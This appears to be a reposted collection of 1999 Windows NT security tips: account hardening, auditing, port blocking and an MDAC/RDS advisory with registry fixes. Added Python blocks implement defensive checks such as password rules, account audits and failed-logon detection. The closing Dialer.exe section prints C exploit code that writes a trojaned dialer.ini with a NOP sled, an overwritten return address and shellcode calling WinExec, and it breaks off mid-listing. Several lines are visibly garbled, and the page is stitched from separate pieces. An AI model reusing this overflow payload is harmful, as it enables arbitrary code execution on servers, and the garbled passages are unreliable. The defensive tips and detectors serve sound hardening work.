NT Security Tips (3)

2019-03-23 10:56

babble, this causes the time needed to crack the password to be extended considerably. And we're here to tell you, brute force guessing of passwords is one of the most popular ways of penetrating a network today. You may also want to employ the PASSFILT.DLL that comes with SP2 and SP3 - it forces strong password choices on users. Learn more about this .DLL in Microsoft's Knowledge Base article. You'll also find information in the README file accompanying the Service Packs.
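As an added illustration (not part of the original tips), here is the PASSFILT.DLL rule set expressed as a checker you can run over candidate passwords before rolling a policy out. The rules are the ones Microsoft documents for PASSFILT.DLL: at least six characters, three of the four character classes, and no user name or part of the full name in the password. The separator list used to split the full name follows Microsoft's description of the filter; the function names and the sample user "jsmith / John Smith" are this example's own.

```python
# Added example, not code from the original page: a PASSFILT.DLL-style strength check.
# Rules: minimum length 6, at least three of four character classes, and the password may
# not contain the user name or any full-name token of three or more characters.

MIN_LENGTH = 6
MIN_CLASSES = 3
# Full-name tokens are split on commas, periods, hyphens, underscores, spaces, pound signs
# and tabs (the separator set Microsoft lists for the filter).
SEPARATORS = ",.-_ #\t"


def name_tokens(full_name: str) -> list:
    """Split a full name into tokens of at least three characters (shorter ones are ignored)."""
    for sep in SEPARATORS:
        full_name = full_name.replace(sep, " ")
    return [tok for tok in full_name.split() if len(tok) >= 3]


def password_problems(password: str, username: str, full_name: str = "") -> list:
    """Return the list of rules the password breaks; an empty list means it passes."""
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")

    classes = sum([
        any(c.isupper() for c in password),
        any(c.islower() for c in password),
        any(c.isdigit() for c in password),
        any(not c.isalnum() for c in password),   # punctuation, symbols, space
    ])
    if classes < MIN_CLASSES:
        problems.append(f"fewer than {MIN_CLASSES} of the four character classes")

    lowered = password.lower()
    if username and username.lower() in lowered:
        problems.append("contains the user name")
    if any(tok.lower() in lowered for tok in name_tokens(full_name)):
        problems.append("contains part of the full name")
    return problems


def passfilt_ok(password: str, username: str, full_name: str = "") -> bool:
    """True when the password would be accepted under the PASSFILT-style rules."""
    return not password_problems(password, username, full_name)


if __name__ == "__main__":
    # Constructed candidates for a made-up user "jsmith" with full name "John Smith".
    for pw in ["password", "Jsmith#1", "Smith#2019", "Ab1!", "Tr0ub4dor!"]:
        print(f"{pw!r:14} -> {password_problems(pw, 'jsmith', 'John Smith') or 'OK'}")
```

The checker reports every rule a candidate breaks rather than stopping at the first one, which is what you want when explaining a rejection to a user or when measuring how much of an existing password set a new policy would invalidate.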

3. It's no secret. The default Administrator account is a target for most intruders. Create a new administrator account, and take away all permissions from the existing Administrator account. Do this by creating a new user, adding them to the Administrators group, and duplicating all account policies and permissions granted to the default Administrator account. Once finished, go back and remove all rights and permissions from the default Administrator account. But leave it enabled; this way intruders won't know it's crippled until they take the time to actually crack the account.

4. Minimize the number of users that belong to the Administrators group. Don't ever add someone to this group for the sake of convenience, and check its membership routinely.

5. Enable auditing on all NT systems. Open the User Manager, and on the Policies | Audit menu, you'll find the account-related events that may be audited. By using Explorer (or File Manager) to view properties, you'll be able to establish auditing on media-related objects as well.

6. Be careful about establishing NT domain trusts. Things can get out of hand quickly on larger networks with several NT domains. Microsoft has released a Domain Planning Guide that really helps a lot when designing your domain layouts. Check the MS NT web site for more information on this tool. http://www.microsoft.com/ntserver

7. Disable NetBIOS over TCP/IP network bindings wherever you can - especially on your NICs leading to the Internet, if at all possible.

8. Block all non-essential TCP/IP ports, both inbound and outbound. In particular, at least block UDP ports 137 and 138, and TCP port 139. This may prevent several types of attacks from ever making their way into your network.

9. Revoke the \need to connect to that particular NT system. Those accounts can then only be used to log on locally.

10. Periodically check your systems for unwanted user accounts. Delete or disable unused accounts. When establishing temporary accounts (for vendors, contractors, etc.), be sure to set an expiration date for the account, and assign rights and permissions carefully.

11. Display a legal notice on your systems that warns each potential user that access to the system is restricted - authorized users only, and sessions may be monitored. In some places it's against the law to monitor computer sessions - even on your own network. With the notice, you'll most likely be able to watch an intruder if you need to, without any future legal recourse against you. Do this on your Web site, your FTP server, your NT logon screens (edit the registry), and any place else that provides a means to do so.

12. Make sure your users do not leave their NT workstations turned on and unattended. Your policies should dictate that screen savers be activated before leaving a workstation momentarily, and that users log off when they aren't going to return in a reasonable amount of time. Additionally, depending on your environment, you may want a policy mandating that systems be powered off when users leave for the day. This is a good way of helping to prevent unwanted modem dialups and rogue Web and FTP sites as well.

13. The Guest account is created by default with each NT installation. If you do not need to permit Guest users on your system, remove or disable the Guest account, and take the extra time to set up a unique user ID for each person who must access your system temporarily. If you don't want to delete the Guest account, preferring instead to disable it, make certain you check it routinely to ensure it remains disabled.
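Tips 3, 4, 10 and 13 all come down to reviewing the account database on a schedule rather than once. As an added example that is not part of the original tips, the script below runs those checks over a constructed account export (made-up names and dates; the record layout, the approved-admin list and the 90-day idle threshold are assumptions for the example, not anything the tips specify).

```python
from datetime import date, timedelta

# Constructed sample of what you would collect from User Manager or "net user" output;
# every name and date here is made up for this example.
ACCOUNTS = [
    {"name": "Administrator", "groups": {"Administrators"}, "enabled": True,
     "temporary": False, "expires": None, "last_logon": date(1999, 7, 30)},
    {"name": "sysadm2", "groups": {"Administrators", "Users"}, "enabled": True,
     "temporary": False, "expires": None, "last_logon": date(1999, 8, 3)},
    {"name": "bob", "groups": {"Administrators", "Users"}, "enabled": True,
     "temporary": False, "expires": None, "last_logon": date(1999, 8, 2)},
    {"name": "Guest", "groups": {"Guests"}, "enabled": True,
     "temporary": False, "expires": None, "last_logon": None},
    {"name": "vendor1", "groups": {"Users"}, "enabled": True,
     "temporary": True, "expires": date(1999, 7, 1), "last_logon": date(1999, 6, 20)},
    {"name": "contractor2", "groups": {"Users"}, "enabled": True,
     "temporary": True, "expires": None, "last_logon": date(1999, 8, 1)},
    {"name": "olduser", "groups": {"Users"}, "enabled": True,
     "temporary": False, "expires": None, "last_logon": date(1999, 1, 10)},
]

APPROVED_ADMINS = {"sysadm2"}        # the renamed admin account(s) you actually manage (assumed)
STALE_AFTER = timedelta(days=90)     # assumed threshold for "unused"


def audit_accounts(accounts, approved_admins, today, stale_after=STALE_AFTER):
    """Return (account, finding) pairs for the conditions tips 3, 4, 10 and 13 warn about."""
    findings = []
    for acct in accounts:
        name, groups = acct["name"], acct["groups"]

        if name == "Administrator":
            # Tip 3: the built-in account keeps no rights but stays enabled as a decoy.
            if "Administrators" in groups:
                findings.append((name, "built-in Administrator still holds Administrators membership"))
            if not acct["enabled"]:
                findings.append((name, "built-in Administrator is disabled; tip 3 says leave it enabled"))
        elif "Administrators" in groups and name not in approved_admins:
            # Tip 4: nobody gets Administrators membership for convenience.
            findings.append((name, "in Administrators but not on the approved list"))

        if name == "Guest" and acct["enabled"]:                      # tip 13
            findings.append((name, "Guest account is enabled"))

        if acct["temporary"]:                                         # tip 10
            if acct["expires"] is None:
                findings.append((name, "temporary account has no expiration date"))
            elif acct["expires"] < today and acct["enabled"]:
                findings.append((name, "expired temporary account is still enabled"))

        if acct["enabled"] and acct["last_logon"] is not None:        # tip 10, unused accounts
            idle = (today - acct["last_logon"]).days
            if idle > stale_after.days:
                findings.append((name, f"no logon for {idle} days; disable if unused"))
    return findings


def run_audit(today=date(1999, 8, 4)):
    """Run the audit over the constructed sample as of a fixed date so results are repeatable."""
    return audit_accounts(ACCOUNTS, APPROVED_ADMINS, today)


if __name__ == "__main__":
    for name, finding in run_audit():
        print(f"{name:14} {finding}")
```

Run against the sample, only sysadm2 comes back clean; everything else trips exactly the rule the corresponding tip describes, which is the point of keeping the approved-admin list and the expiration dates somewhere the audit can read them.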

14. Monitor your networks closely. A large percentage of break-ins occur on networks that were already secure to some extent, but simply weren't monitored closely enough. Use a robust network monitoring package to perform this task for you -- NTManage comes to mind here. You may want to use a real-time attack recognition system, like the upcoming RealSecure from ISS. And, you might want some cool registry, event log, and access control tools, like those found at Somarsoft.
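One concrete stream the monitoring in tip 14 should watch, and the one the audit settings in tip 5 produce, is failed logons, since tip 2 says password guessing is how most networks get broken into. As an added example (not the page's own code, and not any of the products named above), the script below runs a sliding-window count over constructed Security-log lines and flags a burst of logon failures from one workstation, plus any successful logon that follows such a burst. NT's event IDs 528 (successful logon) and 529 (logon failure) are real; the one-line export layout, the threshold and the window are this example's assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample lines, made up for this example. The layout
# "date time log event-id outcome user workstation" is a simplified export format of this
# example's own; a real NT Security log export has more fields. Event IDs follow NT:
# 528 = successful logon, 529 = logon failure (unknown user name or bad password).
SAMPLE_LOG = """\
1999-08-04 10:14:50 Security 529 Failure jsmith WS-FINANCE
1999-08-04 10:14:58 Security 528 Success jsmith WS-FINANCE
1999-08-04 10:15:02 Security 529 Failure Administrator WS-KIOSK
1999-08-04 10:15:05 Security 529 Failure Administrator WS-KIOSK
1999-08-04 10:15:09 Security 529 Failure Administrator WS-KIOSK
1999-08-04 10:15:14 Security 529 Failure Administrator WS-KIOSK
1999-08-04 10:15:20 Security 529 Failure Administrator WS-KIOSK
1999-08-04 10:15:27 Security 529 Failure Administrator WS-KIOSK
1999-08-04 10:15:40 Security 528 Success Administrator WS-KIOSK
"""

LOGON_SUCCESS = 528
LOGON_FAILURE = 529
THRESHOLD = 5                    # this many failures from one workstation ...
WINDOW = timedelta(minutes=2)    # ... inside this interval raise an alert (assumed values)


def parse_line(line):
    """Split one export line into the fields the detector needs."""
    date_s, time_s, _log, event_id, _outcome, user, workstation = line.split()
    return {
        "time": datetime.strptime(f"{date_s} {time_s}", "%Y-%m-%d %H:%M:%S"),
        "event_id": int(event_id),
        "user": user,
        "workstation": workstation,
    }


def detect_guessing(lines, threshold=THRESHOLD, window=WINDOW):
    """Sliding-window failure count per workstation; also flag a success that follows a burst."""
    alerts = []
    recent = defaultdict(deque)   # workstation -> timestamps of failures inside the window
    bursting = set()              # workstations that already crossed the threshold
    for line in lines:
        if not line.strip():
            continue
        ev = parse_line(line)
        ws = ev["workstation"]
        if ev["event_id"] == LOGON_FAILURE:
            q = recent[ws]
            q.append(ev["time"])
            while q and ev["time"] - q[0] > window:   # drop failures older than the window
                q.popleft()
            if len(q) >= threshold and ws not in bursting:
                bursting.add(ws)
                alerts.append(("password guessing", ws, ev["user"], str(ev["time"])))
        elif ev["event_id"] == LOGON_SUCCESS and ws in bursting:
            # A success right after a burst is the alert to work first: a guess may have landed.
            alerts.append(("success after failures", ws, ev["user"], str(ev["time"])))
    return alerts


if __name__ == "__main__":
    for alert in detect_guessing(SAMPLE_LOG.splitlines()):
        print(alert)
```

The single failure followed by a success from WS-FINANCE is the ordinary typo case and produces nothing; the six failures against Administrator from WS-KIOSK raise one alert when the fifth lands, and the success afterwards raises a second, higher-priority one.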

15. Make sure the routers between you and your untrusted bordering networks (Internet, etc.) can (and are configured to) stop source routing, IP spoofing, and ICMP redirects. It's also a really good idea to have anti-scanning features too -- all of these items go a long way towards stopping some nasty attack mechanisms.

16. Disable the Simple TCP/IP Services (if installed) using Control Panel | Services. This stops the chargen, echo, daytime, discard, and quote of the day (qotd) services, any of which could be used for denial of service attacks. None of these services are required for proper network operation - although you should be aware that a few types of network monitors occasionally test the echo port when they cannot get a response using ping.

17. Don't run services you don't actually need - more often than not, they're neglected and frequently become the target of attack.

18. Help raise security awareness. Hey, why not start by telling a friend to come visit our site!

NT Security Tips, Part 9

Keywords: NT, computer security

(Originally posted on 22 July 1999 on the CHINA ASP security technology board)

MDAC (Microsoft Data Access Components) is nothing new to you ASP experts, right? Heh.

It binds your Web server tightly to your database service. It has a component, RDS (Remote Data Services). RDS lets remote users reach your database from the Internet through IIS, and when you install the Option Pack it is installed on your server by default.

RDS has a component called DataFactory, which has holes that let a user:

· discover your unpublished files through the IIS service without authorization

· from the LAN or the WAN, use ODBC to get into your non-public (I'm not sure how to translate this word) server, and hide their source address when attacking other networks

These may seem far removed from us; the most serious hole in this report is:

If you have the Microsoft JET OLE DB Provider or the Microsoft Datashape Provider installed, a user can run Shell() (the VBA command) on the server with system privileges. (For more information, see Microsoft JET Database Engine VBA Vulnerability.)

Combined, these weaknesses let an intruder run dangerous system-level commands of their choosing on your machine. Too... too... too terrifying.

Note that MDAC 2.x is not as easily attacked as the earlier versions, but upgrading your old version still leaves the back door behind, so you should remove MDAC and reinstall it from scratch.

Solution:

Install the final version, MDAC 2.1.2.4202.3:

http://www.microsoft.com/data/download.htm

If you have MDAC 1.5 or 2.x installed and it serves no practical purpose for you, my advice is to disable this service, delete the virtual directory, or delete the following keys:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\ADCLaunch\RDSServer.DataFactory

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\ADCLaunch\AdvancedDataFactory

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\ADCLaunch\VbBusObj.VbBusObjCls

If you do need it, you must do this (of course, I won't force you):

· deny anonymous users access to the /msdac virtual directory

· write your own handler to filter these requests; naturally there's a tutorial, go and look at http://www.microsoft.com/Data/ado/rds/custhand.htm

Or download this file to modify your registry:

http://www.microsoft.com/security/bulletins/handsafe.exe

It will modify these locations in your registry!

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DataFactory]

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DataFactory\HandlerInfo\

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DataFactory\HandlerInfo\safeHandlerList

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DataFactory\HandlerInfo\safeHandlerList\MSDFMAP.Handler

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DataFactory\HandlerInfo\safeHandlerList\MSDFMAP_VB.Handler

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DataFactory\HandlerInfo\safeHandlerList\MSDFMAP_VC.Handler
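To check where a server stands against the registry keys listed in this post, here is an added example (not from the original post, and not Microsoft's handsafe.exe) that audits a registry snapshot represented as a plain dict of key path to values. The key paths are exactly the ones the post lists; the value name HandlerRequired, which the safe-handler fix sets to 1 under HandlerInfo, comes from Microsoft's RDS documentation and is not on this page; the two snapshots are constructed.

```python
# Added example, not code from the original post: audit a registry snapshot for the RDS
# DataFactory settings listed above. The snapshot is {key path: {value name: data}}.

ADCLAUNCH = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\ADCLaunch"
LAUNCH_KEYS = [
    ADCLAUNCH + r"\RDSServer.DataFactory",
    ADCLAUNCH + r"\AdvancedDataFactory",
    ADCLAUNCH + r"\VbBusObj.VbBusObjCls",
]
HANDLER_INFO = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DataFactory\HandlerInfo"
SAFE_LIST = HANDLER_INFO + r"\safeHandlerList"
SAFE_HANDLERS = [
    SAFE_LIST + r"\MSDFMAP.Handler",
    SAFE_LIST + r"\MSDFMAP_VB.Handler",
    SAFE_LIST + r"\MSDFMAP_VC.Handler",
]

# Constructed snapshots: a default Option Pack install, and the same box after the
# safe-handler fix. "HandlerRequired" is the value name handsafe.exe sets (assumption:
# taken from Microsoft's RDS documentation, it is not listed in the post above).
UNPATCHED = {k: {} for k in LAUNCH_KEYS}
HARDENED = dict(UNPATCHED)
HARDENED[HANDLER_INFO] = {"HandlerRequired": 1}
HARDENED[SAFE_LIST] = {}
HARDENED.update({k: {} for k in SAFE_HANDLERS})


def audit_rds(registry, rds_required):
    """Return (action, key) findings. Key names are case-insensitive, so compare lowered."""
    reg = {k.lower(): v for k, v in registry.items()}
    launch_present = [k for k in LAUNCH_KEYS if k.lower() in reg]

    if not rds_required:
        # Nobody uses RDS here: every launch entry is pure attack surface, delete them all.
        return [("remove", k) for k in launch_present]

    # RDS is needed: the launch entries stay, but requests must go through a safe handler.
    findings = []
    info = reg.get(HANDLER_INFO.lower())
    if info is None:
        findings.append(("missing", HANDLER_INFO))
    elif info.get("HandlerRequired") != 1:
        findings.append(("set HandlerRequired=1", HANDLER_INFO))
    for k in SAFE_HANDLERS:
        if k.lower() not in reg:
            findings.append(("missing", k))
    return findings


if __name__ == "__main__":
    for action, key in audit_rds(UNPATCHED, rds_required=False):
        print(action, key)
    print("hardened, RDS required:", audit_rds(HARDENED, rds_required=True) or "clean")
```

The decision the audit hinges on is the one the post makes you answer first: whether anybody actually needs RDS. If not, the three launch entries are the finding; if so, the handler keys are, and the launch entries are left alone.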

NT Security Tips, Part 10

Keywords: NT, computer security

(Originally posted on 4 August 1999 on the CHINA ASP security technology board)

Dialer.exe under NT is the phone dialer program; the hole found this time lets an attacker run some terrifying commands on your server.

Affected versions:

Microsoft Windows NT Workstation 4.0

Microsoft Windows NT Server 4.0

Microsoft Windows NT Server 4.0, Enterprise Edition

Microsoft Windows NT Server 4.0, Terminal Server Edition

When you run Dialer.exe, it looks in dialer.ini for the last number dialed; if that number is exceptionally long, heh heh...

Below is a piece of code that creates a trojaned dialer.ini; when you run dialer.exe it makes you run a batch file named \, as if executing WinExec(\ and then ExitProcess(0). Once dialer.ini has been trojaned, a malicious attacker can make his own code.bat, replace the earlier code.bat with it, and have it run.
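Before the listing, here is the defender's side as an added example (not from the original post): a scan of a dialer.ini-style file for a value that is far too long to be a phone number or that contains non-printable bytes, which is what a trojaned entry of the kind just described looks like on disk. The section and key names in the sample are constructed, since the post does not give dialer.ini's real layout, and the 64-character limit is an assumption, well under the 100 filler bytes the code below writes ahead of the return address.

```python
# Added example, not code from the original post: flag dialer.ini entries that cannot be
# phone numbers. Section and key names are constructed; MAX_LEN is an assumed limit.

MAX_LEN = 64

# Constructed sample: one ordinary entry and one 104-character entry padded with 0x90 bytes.
SAMPLE_INI = "[Last Dialed]\nNumber1=555-0100\nNumber2=" + "A" * 100 + "\x90" * 4 + "\n"


def parse_ini(text):
    """Minimal INI parser: {section: {key: value}}; ';' comments and blank lines are skipped."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip()] = value.strip()
    return sections


def suspicious_entries(text, max_len=MAX_LEN):
    """Return (section, key, reasons) for every value that does not look like a phone number."""
    findings = []
    for section, entries in parse_ini(text).items():
        for key, value in entries.items():
            reasons = []
            if len(value) > max_len:
                reasons.append(f"value is {len(value)} characters")
            # Anything outside printable ASCII has no business in a dialed number.
            if any(not 32 <= ord(c) < 127 for c in value):
                reasons.append("contains non-printable characters")
            if reasons:
                findings.append((section, key, reasons))
    return findings


if __name__ == "__main__":
    for section, key, reasons in suspicious_entries(SAMPLE_INI):
        print(f"[{section}] {key}: {', '.join(reasons)}")
```

Running this over the user profiles on a server before anyone launches Dialer.exe is cheap, and the two reasons it reports map directly onto the two things an overflow payload needs: length past the buffer, and bytes that are code rather than digits.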

Here is a piece of code you can refer to:

```c
#include <stdio.h>
#include <string.h>

int main(void)
{
    FILE *fd;
    char ExploitCode[256];
    int count = 0;

    while (count < 100) {
        ExploitCode[count] = 0x90;
        count++;
    }

    // ExploitCode[100] to ExploitCode[103] overwrites the real return address
    // with 0x77F327E5 which contains a \
    // to our payload of exploit code
    ExploitCode[100] = 0xE5;
    ExploitCode[101] = 0x27;
    ExploitCode[102] = 0xF3;
    ExploitCode[103] = 0x77;

    // procedure prologue - push ebp
    //                    - mov ebp,esp
    ExploitCode[104] = 0x55;
    ExploitCode[105] = 0x8B;

    // This moves into the eax register the address where WinExec() is found
    // in kernel32.dll at address 0x77F1A9DA - This address has been hard-
    // coded in to save room rather than going through LoadLibrary() and
    // GetProcAddress () to get the address - since we've already hard
    // coded in the return address from kernel32.dll - there seems no
    // harm in doing this
    ExploitCode[106] = 0xEC;
    ExploitCode[107] = 0xB8;
    ExploitCode[108] = 0xDA;
    ExploitCode[109] = 0xA9;
```

